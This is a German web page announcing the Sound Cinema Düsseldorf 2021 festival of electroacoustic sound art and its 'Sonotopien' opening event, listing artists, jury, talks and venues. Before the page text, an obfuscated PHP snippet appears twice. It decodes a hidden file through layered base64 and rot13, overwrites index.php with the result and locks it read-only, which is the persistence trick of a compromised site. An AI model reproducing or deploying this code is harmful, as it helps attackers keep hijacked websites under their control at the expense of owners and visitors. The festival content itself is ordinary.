$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Sound Cinema Düsseldorf 2021 – Auditive Medienkulturen

Sound Cinema Düsseldorf 2021

Das Sound Cinema Düsseldorf ist ein Recorded-Sound-Festival für experimentelle Musik und elektroakustische Klangkunst, dessen dritte Ausgabe am Donnerstag, den 14.10.2021 im Cinema Filmkunstkino stattfindet. Zusätzlich findet am Samstag, den 09.10.2021 eine interdisziplinäre Auftaktveranstaltung mit dem Titel Sonotopien – Klang und Raum in der elektroakustischen Musik im NRW-Forum statt.

14.10.2021: Sound Cinema Düsseldorf 2021

Wenn das Bild auf der Leinwand fehlt und nur noch Klänge aus den Lautsprecheranlagen tönen, findet man sich wieder in einem dunklen Kinosaal, zurückgeworfen auf das Hören. Diese Wahrnehmungssituation macht sich das Klangkunstfestival Sound Cinema zunutze, um Audioproduktionen elektroakustischer Musik einen Aufführungsrahmen zu schaffen, in dem die Tonaufnahme als eigenständiges künstlerisches Medium gewürdigt wird.

Aus insgesamt 120 Einreichungen wurden im Vorfeld zehn Audioproduktionen mit einer maximalen Länge von 10 Minuten ausgewählt, die am Veranstaltungsabend präsentiert und anschließend durch eine Fachjury und das
Publikum prämiert werden. Neben einer freien Kategorie, die musikalischen Kompositionen, Soundscapes und Klangcollagen ebenso offensteht, wie narrativen Audioformaten und technoiden Formen, steht mit dem Themenschwerpunkt ‚Isolation‘ ein Phänomen im Zentrum des diesjährigen Festivals, das den Diskurs um die Corona-Präventionsmaßnahmen und deren soziale und psychische Auswirkungen durchzieht. Doch auch jenseits der Pandemie ist Isolation eine vielschichtige Erfahrung des Individuums in seinem Verhältnis zur Umwelt und zu sich selbst – ein Phänomen zwischen Einschluss und Ausschluss, Progressivität und Regression, Meditation und Depression, kreativer Kontemplation und Einöde. Das Sound Cinema 2021 stellt die Frage, wie sich das Thema ‚Isolation‘ kompositorisch und akustisch umsetzen lässt.

Parallel zur Veranstaltung wird das künstlerische Programm über das Düsseldorfer Online-Radio Callshop Radio gestreamt.

Nach der Präsentation des letzten Beitrags zieht sich die Fachjury zur Beratung zurück und das Publikum gibt sein Votum per Stimmzettel ab. Die Verleihung der Preise sowie eine Aftershow-Party erfolgt anschließend im nahegelegenen Salon des Amateurs.

Beteiligte Künstler*innen:

Edgardo Rudnitzky, Nathalie Brum, Sebastian Leopold, Yale Seviş, Andrés Quezada, Julia Vergazova & Nikolya Ulyanov, Sascha Kregel, DJ Raph & Sophia Bauer, Daniel Mayer, Luis Küffner

Jury:

Christian Banasik, Frauke Eckhardt, Denise Ritter

Kurzinformationen

Titel der Veranstaltung: Sound Cinema Düsseldorf 2021
Datum: 14.10.2021
Uhrzeit: Beginn 19 Uhr
Ort: Cinema Filmkunstkino, Schneider-Wibbel-Gasse 5–7, 40213 Düsseldorf
Eintritt: 10€/5€ erm.
Website und Tickets: www.soundcinema.eu

Kurzbeschreibung: Das Sound Cinema Düsseldorf ist ein Recorded-Sound-Festival für experimentelle Musik und elektroakustische Klangkunst. Im Rahmen der Veranstaltung werden 10 Audioproduktionen in einem dunklen Kinosaal präsentiert und anschließend durch eine Fachjury und das Publikum prämiert. Neben einer freien Kategorie, die dem gesamten Spektrum elektroakustischer Musik offensteht, gibt es in diesem J ahr den Themenschwerpunkt Isolation – ein Phänomen zwischen Einschluss und Ausschluss, Progressivität und Regression, Meditation und Depression, kreativer Kontemplation und Einöde. Das Sound Cinema stellt die Frage, wie sich das Thema ‚Isolation‘ kompositorisch und akustisch umsetzen lässt.

09.10.2021: Sonotopien – Klang und Raum in der elektroakustischen Musik

Lecture, Artist-Talk, Sound-Performance. Eine Veranstaltung im Rahmen des Sound Cinema Düsseldorf 2021.

Als Recorded-Sound-Festival für experimentelle Musik und elektroakustische Klangkunst schafft das Sound Cinema Düsseldorf einen Wahrnehmungsraum, der die Rezeption von Tonaufnahmen mit den architektonischen und akustischen Bedingungen des Kinosaals verschränkt. Damit erzeugt das Sound Cinema einen Klangraum, der eine kollektive akustische Erfahrung jenseits von Konzertsaal und Live-Performance ermöglicht.

Um das Verhältnis von Raum und Klang in den akustischen Künsten näher zu beleuchten, findet in der Vorwoche des Recorded-Sound-Wettbewerbs eine interdisziplinäre Auftaktveranstaltung im NRW-Forum statt, die sich dem Thema der Sonotopien (‚sonare‘ = (er)klingen, ‚topos‘ = Ort) widmet. Dabei soll der Diskurs um die Verbindungen von elektroakustischer Musik zu Raum, Räumlichkeit und (Aufführungs-)Ort durch einen wissenschaftlichen Vortrag und eine moderierte Diskussionsrunde mit Künstler*innen genauer erschlossen werden. Den Abschluss bildet eine Kopfhörer-Sound-Performance, die sich mit den räumlichen Bedingungen der Rotunde des NRW-Forums auseinandersetzt und eigens dafür konzipiert wurde.

Programmpunkte

1 | Lecture: „Klang, Musik, Reflexion, Interferenz, Verbindung: Multiple Dimensionen in der Raummusik des 20. Jahrhunderts“, Golo Föllmer

Im 20. Jahrhundert begeben sich Musiker*innen auf neue Reisen in den Raum. Was Raum bedeutet und wie er in Musik und Klangkunst entfaltet werden kann, nimmt dabei ganz unterschiedliche Formen an. Der euklidische Raum der Geometrie, der soziale Raum der Gesellschaft, der klingende Raum der Akustik und Psychoakustik, der tonale Raum von Tonhöhe, Chroma und Klangfarbe und der technische Raum elektronischer Verbindungen bilden allein schon fünf Dimensionen multipler, wandelbarer und heterotoper Konstrukte. Der Vortrag inspiziert Raumkonzepte von Edgard Varèse, Karlheinz Stockhausen, David Tudor, Maryanne Amacher, Max Neuhaus und anderen auf das Verhältnis zwischen Raumvorstellung und klingender Inszenierung.

2 | Artist-Talk: „SOUND-MAPPING. Die sonische Vermessung der Um/Welt“, Dr. Anna Schürmer im Gespräch mit Kirsten Reese und Anne Wellmer

Der Begriff ‚Sonotopien‘ umfasst einerseits Klingendes (‚sonare‘), andererseits Orte (‚topos‘): Klangorte also oder auch die klingende (Ver-)Ortung der (Um-)Welt. Man kann hier an elektroakustische Raummusik im engeren Sinne denken – also die Bewegung von Tönen mittels Spuren und Lautsprechern im Konzertraum. Man kann aber auch das Mapping von Sound selbst fokussieren: die Vermessung oder Kartographierung der Um/Welt mittels konkreter und elektromagnetischer Klänge. Hier kommen konkret Fieldrecordings, Soundscapes und Audio-Walks ins Spiel, die das Werk von Kirsten Reese und Anne Wellmer abstecken. Im Anschluss an Impulsvorträge der beiden Klangkünstlerinnen zu ihrem Werk, spricht Moderatorin Dr. Anna Schürmer mit ihnen über raumklangliche Interventionen von Natur, Technik und Kultur: über Klang-Ethnographie und akustische Medienarchäologie, Sonic Environments und die ökopolitische Konnotation von Noise – und die Frage, ob ‚Sonotopien‘ auch als ‚Utopien‘ hörbar werden.

3 | Sound-Performance: „Kreis: Gehörte Zeit ODER π ODER Conan der Zerstörer“, Felix Kruis und Julian Kämper

In ihrem Feldrechercheprojekt Sounddramaturgien führen Medienkünstler Felix Kruis und Musikwissenschaftler Julian Kämper technische, gestalterische und rezeptionsspezifische Aspekte des 3D-Audio zusammen. In diesem Kontext entwickeln sie ein diskursives 3D-Kopfhörerstück, in dem die zentralen sounddramaturgischen Fragen auf den Kreis – und mit ihm die Kugel – als geometrische Figur projiziert werden: eine collagenartige Versuchsanordnung über das Erzählen im Kreis.

Kurzinformationen

Titel der Veranstaltung: Sonotopien – Klang und Raum in der elektroakustischen Musik. Lecture, Artist-Talk, Sound-Performance. Eine Veranstaltung im Rahmen des Sound Cinema Düsseldorf 2021.
Datum: 09.10.2021
Uhrzeit: Beginn 16 Uhr
Ort: NRW-Forum, Ehrenhof 2, 40479 Düsseldorf
Eintritt frei
Website und Tickets: www.soundcinema.eu

Kurzbeschreibung: Im Zentrum der interdisziplinären Auftaktveranstaltung des Sound Cinema Düsseldorf 2021 steht das Thema der Sonotopien (‚sonare‘= (er)klingen, ‚topos‘ = Ort). Dabei soll der Diskurs um die Verbindungen von elektroakustischer Musik zu Raum, Räumlichkeit und (Aufführungs-)Ort durch den Vortrag „Klang, Musik, Reflexion, Interferenz, Verbindung: Multiple Dimensionen in der Raummusik des 20. Jahrhunderts“ des Medien- und Musikwissenschaftlers Golo Föllmer sowie einen Artist-Talk mit den Klangkünstlerinnen Kirsten Reese und Anne Wellmer zum Thema „SOUND-MAPPING. Die sonische Vermessung der Um/Welt“ genauer erschlossen werden. Den Abschluss bildet das 3D-Kopfhörerstück „Kreis: Gehörte Zeit ODER π ODER Conan der Zerstörer“ von Felix Kruis und Julian Kemper, das sich mit den räumlichen Bedingungen der Rotunde des NRW-Forums auseinandersetzt und eigens dafür konzipiert wurde.